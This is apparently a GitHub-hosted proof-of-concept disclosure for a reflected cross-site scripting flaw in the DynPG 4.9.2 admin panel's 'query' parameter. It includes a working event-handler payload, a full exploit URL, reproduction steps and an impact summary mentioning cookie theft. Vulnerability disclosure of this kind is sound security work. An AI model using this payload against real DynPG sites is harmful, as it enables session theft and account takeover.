Permalink
Cannot retrieve contributors at this time
Name already in use
A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
POC/DynPG 4.9.2 XSS via query parameter
Go to fileThis commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
21 lines (16 sloc)
951 Bytes
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Description | |
| A cross-site scripting (XSS) issue in the DynPG admin login panel version 4.9.2 allows remote attackers to inject JavaScript via the "query" Parameter | |
| ___ | |
| XSS Payload: x"%20onmouseover=alert(4)%20x=" | |
| ___ | |
| Vulnerable Parameter: query | |
| ___ | |
| Steps to Reproduce the Issue: | |
| 1- Login to DynPG admin panel | |
| 2- Paste below POC: | |
| https://localhost/dynpg/backendpopup/popup.php?limit=&orderby=&page=&popUpResource=texts&query=x"%20onmouseover=alert(4)%20x="&refID=&returnCall=&sort=&valueID= | |
| (hover your mouse to “x” to trigger XSS) | |
| Video POC: https://drive.google.com/file/d/1KY8ZLiD5SbjrgpRjmR0D5-iZIcNu-JDN/view?usp=sharing | |
| ___ | |
| Impact | |
| With the help of xss attacker can perform social engineering on users by redirecting them from real website to fake one. Attacker can steal their cookies leading to account takeover and download a malware on their system, and there are many more attacking scenarios a skilled attacker can perform with xss. |